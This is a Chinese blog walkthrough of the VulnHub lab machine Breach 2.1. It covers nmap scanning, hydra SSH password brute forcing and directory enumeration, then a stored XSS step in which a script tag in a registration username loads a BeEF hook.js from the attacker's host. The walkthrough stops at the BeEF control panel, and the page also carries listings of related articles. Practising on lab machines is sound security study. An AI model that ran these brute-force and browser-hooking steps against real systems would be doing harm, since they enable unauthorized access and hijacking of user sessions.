Breach: 2.1

已于 2024-08-02 06:40:03 修改
阅读量148 收藏 4
点赞数 3
文章标签: 安全
于 2024-08-01 07:04:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/140837269
版权

一、主机发现

1.根据描述设置为静态ip

2.nmap扫描端口

nmap -sT --min-rate 10000 -p- 192.168.110.151 -oN port.nmap

二、信息收集

1.对开放端口进行检测

sudo nmap -sC -sV -O -p111,39055,65535 -oN nmap.txt --append-out 192.168.110.151

结果

对11端口进行检测

sudo nmap -sSUC -p111 -oN nmap.txt --append-out 192.168.110.151

结果

2.尝试使用65535端口连接

ssh root@192.168.110.151 -p65535

查看提示信息,猜测有peter,root用户及

in the source或者inthesource,也有可能是blog或者vacation密码

3.更新user.list

4.更新密码

5.使用九头蛇hydra进行密码爆破

hydra -L user.list -P pass.list ssh://192.168.110.151:65535

爆出密码

6.使用peter:inthesource进行ssh连接,还是显示登录失败

先使用‘-vvv’将ssh链接过程保存下来

ssh peter@192.168.110.151 -p65535 -vvv

7.udp全端口扫描

sudo nmap -sU -p- --min-rate 1000 -oN nmap.txt --append-out 192.168.110.151

对结果中的UDP进行扫描

sudo nmap -sUCV -p 111,45513 -oN nmap.txt --append-out 192.168.110.151

再进行TCP扫描,出现80端口

sudo nmap -sS -p- --min-rate 1000 -T4 192.168.110.151

8.访问80端口,这里使用翻译软件翻译了一下

9.目录扫描

dirsearch -u http://192.168.110.151

结果

访问/blog,是首页

访问/images,无权限

三、利用

1.到首页注册xss用户(主要是用户名,其他两个随便)

点击成员

有弹窗,存在xss注入

2.使用beef-xss工具,木有的下载一下(直接输入回车,就会出来提示,输入 y 回车即可,下载时间可能会有点长)

如果下载报错,就尝试输入apt-get update

执行

先F12清理浏览器缓存

重新注册用户

Username: <script src="http://192.168.110.128:3000/hook.js"></script>

访问

http://192.168.110.128:3000/ui/panel

蓝天模糊
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3614
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场)
m0_62652276的博客
12-31 1242
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
Breach-2.1
weixin_44770698的博客
03-10 743
靶场练习-60
Breach 2.0
曹振国的博客
08-03 1067
文章目录一、靶场环境配置二、对目标进行信息收集1.nmap端口探测2.连接ssh服务3.扫描目录4.sql注入找到管理员的账号密码5.通过关键字,漏洞库搜索payload三、使用beef+msfconsole拿shell1.使用beef进行xss攻击2.使用msf生成对应的exp3.使用beef+msf将浏览器链接进行重定向4.将shell转义到msfconsole5.利用python调用本地shell实现交互式命令行四、后渗透1.查看ssh配置文件2.查看所开启的端口3.查看passwd文件里的用户名和密
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
breach靶机
Encild的博客
11-09 414
[2021 11 7] breach靶机端口扫描GetShell 目录 breach靶机 端口扫描 GetShell breach靶机 端口扫描 已知IP为192.168.110.140 直接扫描端口: sudo nmap -sF -p1-65535 192.168.110.140 访问80端口: 翻译: Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门...
解密HTTPS流量并getshell和提权系统权限(Breach1.0)
曹振国的博客
07-28 1085
文章目录一、靶场的搭建及环境配置1.1 靶场介绍1.2 环境配置二、信息收集发现目标2.1 nmap扫描端口探测2.2 访问80端口(Web服务)2.3 访问跳转地址,并保存相关信息三、查看首页源码并解码得到密码3.1 回到首页,查看页面源码,3.2 解码得到账号,密码四、登录CMS通过邮件下载SSL证书的密钥库文件4.1 登录CMS4.2 下载wireshark流量包文件4.3 查看邮件找到SSL证书密钥库文件4.4 通过kali寻找该CMS的漏洞五、导入流量抓包文件、SSL证书到Wireshark5.1
Artificial Intelligence in Computer Intrusion and Virus Creation: Securing with Advanced Firewalls
weixin_65409651的博客
08-07 509
4o。
安全面试常见问题任意文件下载
persist213的博客
08-24 733
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》
经验笔记:Token、Session、Cookie 及密码级别安全存储
qq_45831414的博客
08-28 327
在用户通过身份验证后,服务器会生成一个Token并发给客户端,之后客户端会在每次请求中附带此Token以证明身份。当用户开始与Web应用互动时,服务器会创建一个唯一的Session ID,并将其存储在客户端的Cookie中。本文将探讨如何利用Token、Session 和 Cookie 这三个概念来实现安全的用户认证及会话管理,并重点介绍如何存储密码以达到最高级别的安全性。综合运用Token、Session 和 Cookie,结合安全的密码存储技术,能够显著提高Web应用的安全性和用户体验。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 363
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 545
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
你的软件系统安全
温故而知新
08-22 983
如果你的软件系统可以通过网络访问, 可以由多人操作, 可以访问或操作敏感数据, 或者可能暴露隐私, 等等, 请一定要保护你的系统. 那么你的软件系统安全吗? 一. 先问自己如下 4 个问题 1. What are we working on? 我们的系统在干啥? 例如电商系统: 我们在卖啥? 提供什么售前和售后服务? 用户和帐备信息怎么管理的? 数据是如何防护和归档的? 等等 2. What ...
云等保安全合规解决方案
bocco的博客
08-23 426
在此背景下,云等保(云安全等级保护)安全合规解决方案应运而生,旨在为企业构建一套全面、高效、符合国家安全标准的云安全防护体系。通过构建全面、高效、符合国家安全标准的云安全防护体系,企业不仅能够有效应对云环境中的安全挑战,还能够提升业务竞争力,实现可持续发展。它要求云服务提供商和云租户按照不同的安全等级,采取相应的安全控制措施,确保云环境中的数据、应用及基础设施免受未经授权的访问、使用、泄露、中断、破坏等安全威胁。1. 提升安全性:通过实施云等保,企业能够构建更加安全、可靠的云环境,有效抵御各类安全威胁。
DNS部署与安全
m0_64827698的博客
08-28 946
子域 二级域 顶级域 根域。本地域名服务器(代替主机迭代)去找根域名服务器——>...服务器——>权威服务 客户端。特定服务 公司或组织的名称 公司/国家/...(网站性质或地域)DNS缓存投毒(改映射)、DNS放大攻击(分布拒绝服务DDOS)、子域名劫持。主机找网关(本地域名服务器) 客户端。DNS查询(小数据包,要求速度快),www通常指公司网站的主服务器。
HSE软件组件有哪些?如何实现HSE与主机的通信(同步/异步)?如何使用HSE提供的安全服务?
车载系统攻城狮
08-28 565
从软件组成和接口的使用上对HSE做了更进一步的阐述,消息单元MU在实现主机与HSE的通信过程中扮演着重要的角色,最后给出使用HSE服务的示例,包括同步方式和异步方式!
安全】ssrf
weixin_65583879的博客
08-28 825
的危害,但是curl支持很多协议(curl --version 可以查看其支持的协议),有FTP,FTPS,HTTP,HTTPS,GOPHER,TELNET,接着我们便可以尝试 redis 未授权了,由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。没有过滤http协议和gopher协议,我们使用http协议进行探测,发现 172.18.0.3上只有80端口开放,没有3306,6379等端口开放。原本访问外链资源不会有太大。
顶尖电子称条码秤LS系列称固件,最新固件,固件
最新发布
08-28
顶尖电子称条码秤LS系列称固件,最新固件,固件
Breach-2_final2.1_xss挑战上线:实战演示与攻防策略
在"一起打靶-Breach-2_final2.1.xss上线"这个挑战中,Breach-2.0 是一个实战型的Boot2Root/CTF(Capture The Flag)游戏,它的目标是通过一系列的真实世界场景和意想不到的转折来展示安全攻击和防御的过程。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值